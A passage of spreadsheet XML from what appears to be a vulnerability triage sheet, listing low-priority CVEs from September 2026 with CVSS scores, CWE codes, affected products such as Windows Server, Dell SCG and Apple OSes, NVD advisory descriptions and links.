      <c r="J1093" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1093"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093" s="5" t="inlineStr"/>
      <c r="M1093" s="5" t="inlineStr"/>
      <c r="N1093" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1093" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1093" s="5" t="inlineStr"/>
      <c r="Q1093" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1093" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S1093" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69808</t>
        </is>
      </c>
    </row>
    <row r="1094">
      <c r="A1094" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1094" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1094" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69862</t>
        </is>
      </c>
      <c r="D1094" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1094" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1094" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1094" s="5" t="inlineStr"/>
      <c r="H1094" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1094" s="5" t="inlineStr"/>
      <c r="J1094" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1094"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1094" s="5" t="inlineStr"/>
      <c r="M1094" s="5" t="inlineStr"/>
      <c r="N1094" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1094" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1094" s="5" t="inlineStr"/>
      <c r="Q1094" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-200</t>
        </is>
      </c>
      <c r="R1094" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Wireless Wide Area Network Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S1094" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69862</t>
        </is>
      </c>
    </row>
    <row r="1095">
      <c r="A1095" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1095" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1095" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70145</t>
        </is>
      </c>
      <c r="D1095" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1095" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1095" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1095" s="5" t="inlineStr"/>
      <c r="H1095" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1095" s="5" t="inlineStr"/>
      <c r="J1095" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1095"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095" s="5" t="inlineStr"/>
      <c r="M1095" s="5" t="inlineStr"/>
      <c r="N1095" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1095" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1095" s="5" t="inlineStr"/>
      <c r="Q1095" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1095" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Search Component allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S1095" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70145</t>
        </is>
      </c>
    </row>
    <row r="1096">
      <c r="A1096" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1096" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1096" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76081</t>
        </is>
      </c>
      <c r="D1096" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1096" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1096" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1096" s="5" t="inlineStr"/>
      <c r="H1096" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1096" s="5" t="inlineStr"/>
      <c r="J1096" s="5" t="inlineStr"/>
      <c r="K1096" s="5" t="inlineStr"/>
      <c r="L1096" s="5" t="inlineStr"/>
      <c r="M1096" s="5" t="inlineStr"/>
      <c r="N1096" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1096" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1096" s="5" t="inlineStr"/>
      <c r="Q1096" s="5" t="inlineStr">
        <is>
          <t>CWE-193</t>
        </is>
      </c>
      <c r="R1096" s="5" t="inlineStr">
        <is>
          <t>ZITADEL is an open source identity management platform. Prior to version 4.16.0, a bug in how ZITADEL updates permissions when multiple project roles are deleted at the same time can cause some user permissions to be missed. This issue specifically affects User Grants on Granted Projects (projects shared between different organizations), potentially allowing users to keep access rights that were supposed to be completely removed. This issue has been fully resolved in version 4.16.0. There are no configuration workarounds. Upgrading to a patched version is the only way to trigger the automatic cleanup migration. Those who cannot upgrade immediately should manually review user permissions specifically for Granted Projects where multiple roles were recently deleted.</t>
        </is>
      </c>
      <c r="S1096" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76081</t>
        </is>
      </c>
    </row>
    <row r="1097">
      <c r="A1097" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1097" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1097" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76104</t>
        </is>
      </c>
      <c r="D1097" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1097" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1097" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1097" s="5" t="inlineStr"/>
      <c r="H1097" s="5" t="inlineStr"/>
      <c r="I1097" s="5" t="inlineStr"/>
      <c r="J1097" s="5" t="inlineStr"/>
      <c r="K1097" s="5" t="inlineStr"/>
      <c r="L1097" s="5" t="inlineStr"/>
      <c r="M1097" s="5" t="inlineStr"/>
      <c r="N1097" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1097" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1097" s="5" t="inlineStr"/>
      <c r="Q1097" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="R1097" s="5" t="inlineStr">
        <is>
          <t>Dell ObjectScale, versions prior to 4.4.0.0, contains an Incorrect Permission Assignment for Critical Resource vulnerability in the OS. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Denial of service.</t>
        </is>
      </c>
      <c r="S1097" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76104</t>
        </is>
      </c>
    </row>
    <row r="1098">
      <c r="A1098" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1098" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1098" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77159</t>
        </is>
      </c>
      <c r="D1098" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1098" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1098" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1098" s="5" t="inlineStr"/>
      <c r="H1098" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1098" s="5" t="inlineStr"/>
      <c r="J1098" s="5" t="inlineStr"/>
      <c r="K1098" s="5" t="inlineStr"/>
      <c r="L1098" s="5" t="inlineStr"/>
      <c r="M1098" s="5" t="inlineStr"/>
      <c r="N1098" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1098" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P1098" s="5" t="inlineStr"/>
      <c r="Q1098" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="R1098" s="5" t="inlineStr">
        <is>
          <t>A symlink-following flaw was found in libvirt's qemuTPMEmulatorPrepareHost() function. The function uses a path-based chown() on the swtpm logfile without checking for symbolic links. A local attacker with access to the swtpm account can replace the logfile with a symlink, causing libvirtd (running as root) to transfer ownership of an arbitrary file to the swtpm user.</t>
        </is>
      </c>
      <c r="S1098" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77159</t>
        </is>
      </c>
    </row>
    <row r="1099">
      <c r="A1099" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1099" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1099" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77491</t>
        </is>
      </c>
      <c r="D1099" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1099" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1099" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1099" s="5" t="inlineStr"/>
      <c r="H1099" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1099" s="5" t="inlineStr"/>
      <c r="J1099" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1099"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099" s="5" t="inlineStr"/>
      <c r="M1099" s="5" t="inlineStr"/>
      <c r="N1099" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1099" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1099" s="5" t="inlineStr"/>
      <c r="Q1099" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1099" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows GDI allows an unauthorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S1099" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77491</t>
        </is>
      </c>
    </row>
    <row r="1100">
      <c r="A1100" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1100" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79975</t>
        </is>
      </c>
      <c r="D1100" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1100" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1100" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1100" s="5" t="inlineStr"/>
      <c r="H1100" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1100" s="5" t="inlineStr"/>
      <c r="J1100" s="5" t="inlineStr"/>
      <c r="K1100" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1100" s="5" t="inlineStr"/>
      <c r="M1100" s="5" t="inlineStr"/>
      <c r="N1100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1100" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1100" s="5" t="inlineStr"/>
      <c r="Q1100" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R1100" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Certificate Validation vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to server-side request forgery.</t>
        </is>
      </c>
      <c r="S1100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79975</t>
        </is>
      </c>
    </row>
    <row r="1101">
      <c r="A1101" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1101" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80054</t>
        </is>
      </c>
      <c r="D1101" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1101" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1101" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1101" s="5" t="inlineStr"/>
      <c r="H1101" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1101" s="5" t="inlineStr"/>
      <c r="J1101" s="5" t="inlineStr"/>
      <c r="K1101" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1101" s="5" t="inlineStr"/>
      <c r="M1101" s="5" t="inlineStr"/>
      <c r="N1101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1101" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1101" s="5" t="inlineStr"/>
      <c r="Q1101" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="R1101" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Incorrect Permission Assignment for Critical Resource vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S1101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80054</t>
        </is>
      </c>
    </row>
    <row r="1102">
      <c r="A1102" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1102" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80058</t>
        </is>
      </c>
      <c r="D1102" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1102" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1102" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1102" s="5" t="inlineStr"/>
      <c r="H1102" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1102" s="5" t="inlineStr"/>
      <c r="J1102" s="5" t="inlineStr"/>
      <c r="K1102" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1102" s="5" t="inlineStr"/>
      <c r="M1102" s="5" t="inlineStr"/>
      <c r="N1102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1102" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1102" s="5" t="inlineStr"/>
      <c r="Q1102" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="R1102" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Cleartext Storage of Sensitive Information vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information exposure.</t>
        </is>
      </c>
      <c r="S1102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80058</t>
        </is>
      </c>
    </row>
    <row r="1103">
      <c r="A1103" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1103" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80167</t>
        </is>
      </c>
      <c r="D1103" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1103" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1103" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1103" s="5" t="inlineStr"/>
      <c r="H1103" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1103" s="5" t="inlineStr"/>
      <c r="J1103" s="5" t="inlineStr"/>
      <c r="K1103" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1103" s="5" t="inlineStr"/>
      <c r="M1103" s="5" t="inlineStr"/>
      <c r="N1103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1103" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1103" s="5" t="inlineStr"/>
      <c r="Q1103" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="R1103" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Hard-coded Cryptographic Key vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information disclosure.</t>
        </is>
      </c>
      <c r="S1103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80167</t>
        </is>
      </c>
    </row>
    <row r="1104">
      <c r="A1104" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1104" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82920</t>
        </is>
      </c>
      <c r="D1104" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1104" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1104" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G1104" s="5" t="inlineStr"/>
      <c r="H1104" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1104" s="5" t="inlineStr"/>
      <c r="J1104" s="5" t="inlineStr"/>
      <c r="K1104" s="5" t="inlineStr"/>
      <c r="L1104" s="5" t="inlineStr"/>
      <c r="M1104" s="5" t="inlineStr"/>
      <c r="N1104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1104" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1104" s="5" t="inlineStr"/>
      <c r="Q1104" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1104" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions 11.9.x &lt;= 11.9.0, 11.8.x &lt;= 11.8.4, 11.7.x &lt;= 11.7.7 fail to enforce authorization boundaries on the access control policy update endpoint which allows a channel or team administrator to detach a system-assigned ABAC parent policy via a crafted PUT /api/v4/access_control_policies request with an empty imports list.. Mattermost Advisory ID: MMSA-2026-00724</t>
        </is>
      </c>
      <c r="S1104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82920</t>
        </is>
      </c>
    </row>
    <row r="1105">
      <c r="A1105" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1105" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84489</t>
        </is>
      </c>
      <c r="D1105" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1105" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1105" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1105" s="5" t="inlineStr"/>
      <c r="H1105" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1105" s="5" t="inlineStr"/>
      <c r="J1105" s="5" t="inlineStr"/>
      <c r="K1105" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos</t>
        </is>
      </c>
      <c r="L1105" s="5" t="inlineStr"/>
      <c r="M1105" s="5" t="inlineStr"/>
      <c r="N1105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1105" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1105" s="5" t="inlineStr"/>
      <c r="Q1105" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R1105" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow was addressed with improved bounds checking. This issue is fixed in iOS 18.7.10 and iPadOS 18.7.10, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.7.8, macOS Sonoma 14.8.8. An app may be able to cause a denial of service.</t>
        </is>
      </c>
      <c r="S1105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84489</t>
        </is>
      </c>
    </row>
    <row r="1106">
      <c r="A1106" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1106" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84491</t>
        </is>
      </c>
      <c r="D1106" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1106" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1106" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1106" s="5" t="inlineStr"/>
      <c r="H1106" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1106" s="5" t="inlineStr"/>
      <c r="J1106" s="5" t="inlineStr"/>
      <c r="K1106" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L1106" s="5" t="inlineStr"/>
      <c r="M1106" s="5" t="inlineStr"/>
      <c r="N1106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1106" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1106" s="5" t="inlineStr"/>
      <c r="Q1106" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R1106" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, tvOS 27, visionOS 27, watchOS 27. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S1106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84491</t>
        </is>
      </c>
    </row>
    <row r="1107">
      <c r="A1107" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1107" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84517</t>
        </is>
      </c>
      <c r="D1107" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1107" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1107" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1107" s="5" t="inlineStr"/>
      <c r="H1107" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1107" s="5" t="inlineStr"/>
      <c r="J1107" s="5" t="inlineStr"/>
      <c r="K1107" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L1107" s="5" t="inlineStr"/>
      <c r="M1107" s="5" t="inlineStr"/>
      <c r="N1107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1107" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1107" s="5" t="inlineStr"/>
      <c r="Q1107" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R1107" s="5" t="inlineStr">
        <is>
          <t>An integer overflow was addressed with improved input validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S1107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84517</t>
        </is>
      </c>
    </row>
    <row r="1108">
      <c r="A1108" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1108" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84521</t>
        </is>
      </c>
      <c r="D1108" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1108" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1108" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1108" s="5" t="inlineStr"/>
      <c r="H1108" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1108" s="5" t="inlineStr"/>
      <c r="J1108" s="5" t="inlineStr"/>
      <c r="K1108" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:visionos</t>
        </is>
      </c>
      <c r="L1108" s="5" t="inlineStr"/>
      <c r="M1108" s="5" t="inlineStr"/>
      <c r="N1108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1108" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1108" s="5" t="inlineStr"/>
      <c r="Q1108" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1108" s="5" t="inlineStr">
        <is>
          <t>A use after free issue was addressed with improved memory management. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, visionOS 27. An app may be able to cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S1108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84521</t>
        </is>
      </c>
    </row>
    <row r="1109">
      <c r="A1109" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1109" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84523</t>
        </is>
      </c>
      <c r="D1109" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E1109" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1109" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1109" s="5" t="inlineStr"/>
      <c r="H1109" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1109" s="5" t="inlineStr"/>
      <c r="J1109" s="5" t="inlineStr"/>
      <c r="K1109" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L1109" s="5" t="inlineStr"/>
      <c r="M1109" s="5" t="inlineStr"/>
      <c r="N1109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1109" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1109" s="5" t="inlineStr"/>
      <c r="Q1109" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R1109" s="5" t="inlineStr">
        <is>
